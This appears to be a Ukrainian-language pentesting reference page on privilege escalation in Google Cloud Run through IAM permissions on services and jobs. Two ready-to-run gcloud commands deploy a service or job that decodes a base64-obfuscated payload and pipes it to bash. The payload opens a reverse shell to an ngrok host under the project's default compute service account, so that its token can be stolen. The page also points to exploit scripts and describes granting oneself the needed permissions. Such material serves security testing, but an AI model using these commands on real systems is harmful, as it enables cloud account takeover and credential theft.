Cloud Run

Для отримання додаткової інформації про Cloud Run перегляньте:

run.services.create, iam.serviceAccounts.actAs, run.routes.invoke

Атакувальник з цими дозволами може створити сервіс запуску, що виконує довільний код (довільний Docker контейнер), прикріпити до нього обліковий запис служби та зробити код витік токена облікового запису служби з метаданих.

Скрипт вразливості для цього методу можна знайти тут, а Docker-образ можна знайти тут.

Зверніть увагу, що при використанні gcloud run deploy замість простого створення сервісу потрібен дозвіл update. Перевірте приклад тут.

run.services.update, iam.serviceAccounts.actAs

Схоже на попереднє, але оновлення сервісу:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

run.services.setIamPolicy

Надайте собі попередні дозволи на хмарний запуск.

run.jobs.create, run.jobs.run, (run.jobs.get)

Запустіть завдання зі зворотнім shell, щоб вкрасти обліковий запис служби, вказаний у команді. Ви можете знайти експлойт тут.

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Аналогічно попередньому, можливо оновити завдання та оновити SA, команду та виконати її:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

run.jobs.setIamPolicy

Надайте собі попередні дозволи на Cloud Jobs.

References

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/